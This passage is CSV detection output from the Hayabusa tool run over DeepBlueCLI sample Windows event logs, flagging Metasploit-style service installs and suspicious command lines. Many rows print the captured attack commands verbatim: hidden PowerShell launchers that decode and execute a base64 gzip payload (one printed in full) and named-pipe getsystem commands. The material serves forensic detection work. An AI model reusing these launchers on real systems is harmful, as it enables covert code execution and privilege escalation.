IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: 
demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-20 05:59:41.676 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\cmd.exe | PID: 0xe28 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 05:59:41.680 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | 
PID: 0xd2c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 05:59:41.854 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""powershell.exe"" -nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('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'));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd(); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc00 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 06:00:23.453 +09:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: QPFRRKggYorFrGnJ | Path: %SYSTEMROOT%\OJuUfMOy.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MetasploitServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-20 06:00:23.453 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: QPFRRKggYorFrGnJ | Path: %SYSTEMROOT%\OJuUfMOy.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-20 06:00:23.453 +09:00,IE10Win7,7045,info,,New Service Installed,Name: QPFRRKggYorFrGnJ | Path: %SYSTEMROOT%\OJuUfMOy.exe | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-20 06:00:33.473 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SpyNetService 
-RestrictPrivileges -AccessKey CC5A59EB-39B8-70D1-D323-21B5170E809F | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xb1c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 06:00:33.590 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SpyNetService -RestrictPrivileges -AccessKey CC5A59EB-39B8-70D1-D323-21B5170E809F -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xd30 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 06:08:05.647 +09:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: KAyUYDrNOKClCGXL | Path: %SYSTEMROOT%\BRMPXyFc.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MetasploitServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-20 06:08:05.647 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: KAyUYDrNOKClCGXL | Path: %SYSTEMROOT%\BRMPXyFc.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-20 06:08:05.647 +09:00,IE10Win7,7045,info,,New Service Installed,Name: KAyUYDrNOKClCGXL | Path: %SYSTEMROOT%\BRMPXyFc.exe | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-20 06:12:10.677 +09:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,Svc: adsymn | Path: cmd.exe /c echo adsymn > \\.\pipe\adsymn | Account: LocalSystem | Start Type: demand 
start,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-20 06:12:10.677 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: adsymn | Path: cmd.exe /c echo adsymn > \\.\pipe\adsymn,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-20 06:12:10.677 +09:00,IE10Win7,7045,info,,New Service Installed,Name: adsymn | Path: cmd.exe /c echo adsymn > \\.\pipe\adsymn | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-20 06:12:10.682 +09:00,IE10Win7,4688,medium,,Suspicious Cmd Line_Possible Meterpreter getsystem,Cmd Line: cmd.exe /c echo adsymn > \\.\pipe\adsymn | Path: C:\Windows\System32\cmd.exe | PID: 0x3dc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleMeterpreterGetSystem.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 06:12:10.682 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /c echo adsymn > \\.\pipe\adsymn | Path: C:\Windows\System32\cmd.exe | PID: 0x3dc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 06:12:45.349 +09:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: xnQMIQKvTLVeKYjo | Path: %SYSTEMROOT%\LCCxAHbh.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MetasploitServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-20 06:12:45.349 
+09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: xnQMIQKvTLVeKYjo | Path: %SYSTEMROOT%\LCCxAHbh.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-20 06:12:45.349 +09:00,IE10Win7,7045,info,,New Service Installed,Name: xnQMIQKvTLVeKYjo | Path: %SYSTEMROOT%\LCCxAHbh.exe | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-20 06:13:04.090 +09:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,Svc: hmoopk | Path: cmd.exe /c echo hmoopk > \\.\pipe\hmoopk | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-20 06:13:04.090 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: hmoopk | Path: cmd.exe /c echo hmoopk > \\.\pipe\hmoopk,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-20 06:13:04.090 +09:00,IE10Win7,7045,info,,New Service Installed,Name: hmoopk | Path: cmd.exe /c echo hmoopk > \\.\pipe\hmoopk | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-20 06:13:04.094 +09:00,IE10Win7,4688,medium,,Suspicious Cmd Line_Possible Meterpreter getsystem,Cmd Line: cmd.exe /c echo hmoopk > \\.\pipe\hmoopk | Path: C:\Windows\System32\cmd.exe | PID: 0xc10 | User: IE10WIN7$ | LID: 
0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleMeterpreterGetSystem.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 06:13:04.094 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /c echo hmoopk > \\.\pipe\hmoopk | Path: C:\Windows\System32\cmd.exe | PID: 0xc10 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 06:23:37.125 +09:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,"Svc: aCshIvAdgRYNApEv | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-20 06:23:37.125 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,"Svc: aCshIvAdgRYNApEv | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object 
IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-20 06:23:37.125 +09:00,IE10Win7,7045,info,,New Service Installed,"Name: aCshIvAdgRYNApEv | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAFhX4FcCA71WbW/aSBD+nEr9D1aFhK06GAgpTaRKZwMGEkwAB/NWVG3stVlYvMRe89brf78x2Alpm1PuTjoL5N2dmZ3ZZ57ZsRv5NifMF8JS5PbH1o4I39+/O+ugAC0FMbMqtL2NLGR2YRiRzXLtDD3p7AwUMkHppjMozUbl/lr4IogTdbWqsiUi/vT6uhIFAfb5cZ6rY66GIV4+UIJDURL+FAYzHODzu4c5trnwXch8y9Upe0A0UdtVkD3DwrnqO7GsxWwUh5gzV5RwMfv1a1aanBemudpjhGgoZs1dyPEy51CalYQfUuzwfrfCYtYgdsBC5vLcgPgXxVzfD5GL27DbGhuYz5gTZiU4DPwCzKPAF06PFe9z1BKzMOwEzFYdJ8AhGOWa/potsJjxI0pl4Q9xkgTRi3xOlhjkHAdsZeJgTWwc5hrIdyjuYXcqtvEmPftbjcRTI9Dq8ECSIT2vR2swJ6L4uEFW+jXeY2YleH7KLuDx4/279+/clBjOPuw442HxlBcwOpscxhgiFjssJAfdL0JeFgxwijgLdjDN3AcRlqbCJE7IZDoFX/rF2Kk5V/pwKb++TSG1AQu/uPs8tIdG+I2CZGIx4kzBMklcZlbuGfH66wSsYpf4uLrz0ZLYKcfE3+UBuxQfTp1L1doQm5hNBNipYoo9xGNIZWHyq1ltSfiTrRYR6uBAtSGXIUQFaZZeBnPMkpht+gZeAmLHeRZS4gKzcaqdsHmXeo/noJStUBSGstCJoLRsWTAxotiRBdUPSSJSI84Ow+xzuEZEObFRyNPtplKKY+KvwvyQB5ENSYSz35srbBNEYyhkoUEcrO1M4qV+s78FooIoJb4HO60hEbASA2DymBqBI7+ggZQzMW8uVxQvQfVQ6jpFHhR2UhcHSiEPO9mfA00Jf2R3DEmKxUmYkGeTMi4LFgk43BgxvCec+k/BnNwch7AqAU7yI6aFNNF2PKZ+Jrpc9Kxi+T4mawLY
AZ6AAzR6wJYaCvGnkskDAE78oNyRigrPqOlTw9YWpKBuSKFpwL9PLpqsWnZub+YNJahuZ67aDJtGo1PtNhql9Y1plbhZa/LbTpMbteF8bqqNXn/Ex021cU/yi1Fpv7ohe7OlOqOt8mmv7Td5bbufe447qrquV3bNXuFSJ61Bpavli6hVrUWtgbbR8qWwRjaNLul3Fzc6fxhZFPVdxRsWrhDZtoK5VWDGvqmq9dmFvb9xrfrMcHajhnI1KC3UmqpW/Jqla+x2pAVqR7GQZ7HN7bxOB15F1XSb4HG3r2vdrq6p/fr8sXqleGA7RDNtYBXJeDXszWCuQwi3Sr7UdPCejboAUp2pyOuBjlcp2jMXdKofVe1jm4VFtNCYqoGOPn6EuEYrvUNBft8vMtWi7SFSW+OdriiFUaekNvJkUPfUeEvkaV2khuvqvqoULIc5g8v2yFWsIS0r1cr9ynYVRdk0qrf2uLD9fFcuafnHypIs6UPRUa76nzV/c+t11p7THZR72/buAfz1FcX6EPMGiJPxN4WCfdcr07vo4oQTrzUDAwXhDFHgClzvaenqLNCTi7rDSGwhis+dfIEDH1NofNAaU/arlDI7bh5P9zo0r2NLmUIl92F4UfztSBKeFKXnjpIuXV+PIVwoppTmuRb2PT6T89uLfB7aQn5bysPR337MClvtxKft5Li1vMDs1Bc9+JLiess8eI+PtUrzf4A0qfYZvJy3QPq89jfSN8Gcl19C8Yv45cI/wv3fYTFAhIO6CXcXxce2+jokCaFOvkuSpAFb3OSJPxTvIn7ehi+WvwCZDrcJpgoAAA==''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-20 06:23:37.132 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object 
IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\cmd.exe | PID: 0x294 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 06:23:37.135 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x7c8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 06:23:37.348 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""powershell.exe"" -nop -w hidden -c $s=New-Object 
IO.MemoryStream(,[Convert]::FromBase64String('H4sIAFhX4FcCA71WbW/aSBD+nEr9D1aFhK06GAgpTaRKZwMGEkwAB/NWVG3stVlYvMRe89brf78x2Alpm1PuTjoL5N2dmZ3ZZ57ZsRv5NifMF8JS5PbH1o4I39+/O+ugAC0FMbMqtL2NLGR2YRiRzXLtDD3p7AwUMkHppjMozUbl/lr4IogTdbWqsiUi/vT6uhIFAfb5cZ6rY66GIV4+UIJDURL+FAYzHODzu4c5trnwXch8y9Upe0A0UdtVkD3DwrnqO7GsxWwUh5gzV5RwMfv1a1aanBemudpjhGgoZs1dyPEy51CalYQfUuzwfrfCYtYgdsBC5vLcgPgXxVzfD5GL27DbGhuYz5gTZiU4DPwCzKPAF06PFe9z1BKzMOwEzFYdJ8AhGOWa/potsJjxI0pl4Q9xkgTRi3xOlhjkHAdsZeJgTWwc5hrIdyjuYXcqtvEmPftbjcRTI9Dq8ECSIT2vR2swJ6L4uEFW+jXeY2YleH7KLuDx4/279+/clBjOPuw442HxlBcwOpscxhgiFjssJAfdL0JeFgxwijgLdjDN3AcRlqbCJE7IZDoFX/rF2Kk5V/pwKb++TSG1AQu/uPs8tIdG+I2CZGIx4kzBMklcZlbuGfH66wSsYpf4uLrz0ZLYKcfE3+UBuxQfTp1L1doQm5hNBNipYoo9xGNIZWHyq1ltSfiTrRYR6uBAtSGXIUQFaZZeBnPMkpht+gZeAmLHeRZS4gKzcaqdsHmXeo/noJStUBSGstCJoLRsWTAxotiRBdUPSSJSI84Ow+xzuEZEObFRyNPtplKKY+KvwvyQB5ENSYSz35srbBNEYyhkoUEcrO1M4qV+s78FooIoJb4HO60hEbASA2DymBqBI7+ggZQzMW8uVxQvQfVQ6jpFHhR2UhcHSiEPO9mfA00Jf2R3DEmKxUmYkGeTMi4LFgk43BgxvCec+k/BnNwch7AqAU7yI6aFNNF2PKZ+Jrpc9Kxi+T4mawLYAZ6AAzR6wJYaCvGnkskDAE78oNyRigrPqOlTw9YWpKBuSKFpwL9PLpqsWnZub+YNJahuZ67aDJtGo1PtNhql9Y1plbhZa/LbTpMbteF8bqqNXn/Ex021cU/yi1Fpv7ohe7OlOqOt8mmv7Td5bbufe447qrquV3bNXuFSJ61Bpavli6hVrUWtgbbR8qWwRjaNLul3Fzc6fxhZFPVdxRsWrhDZtoK5VWDGvqmq9dmFvb9xrfrMcHajhnI1KC3UmqpW/Jqla+x2pAVqR7GQZ7HN7bxOB15F1XSb4HG3r2vdrq6p/fr8sXqleGA7RDNtYBXJeDXszWCuQwi3Sr7UdPCejboAUp2pyOuBjlcp2jMXdKofVe1jm4VFtNCYqoGOPn6EuEYrvUNBft8vMtWi7SFSW+OdriiFUaekNvJkUPfUeEvkaV2khuvqvqoULIc5g8v2yFWsIS0r1cr9ynYVRdk0qrf2uLD9fFcuafnHypIs6UPRUa76nzV/c+t11p7THZR72/buAfz1FcX6EPMGiJPxN4WCfdcr07vo4oQTrzUDAwXhDFHgClzvaenqLNCTi7rDSGwhis+dfIEDH1NofNAaU/arlDI7bh5P9zo0r2NLmUIl92F4UfztSBKeFKXnjpIuXV+PIVwoppTmuRb2PT6T89uLfB7aQn5bysPR337MClvtxKft5Li1vMDs1Bc9+JLiess8eI+PtUrzf4A0qfYZvJy3QPq89jfSN8Gcl19C8Yv45cI/wv3fYTFAhIO6CXcXxce2+jokCaFOvkuSpAFb3OSJPxTvIn7ehi+WvwCZDrcJpgoAAA=='));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd(); | 
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe60 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 06:32:11.794 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xfb0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 06:32:11.932 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x2a8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 06:32:15.491 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Path: C:\Windows\System32\mmc.exe | PID: 0xb54 | User: IEUser | LID: 0x6590f",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 07:03:41.021 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x7a4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 07:04:04.853 
+09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x130 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 07:05:07.184 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x638 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 07:05:22.839 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x794 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 07:38:23.648 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x790 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 08:21:28.626 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x628 | User: IE10WIN7$ | LID: 
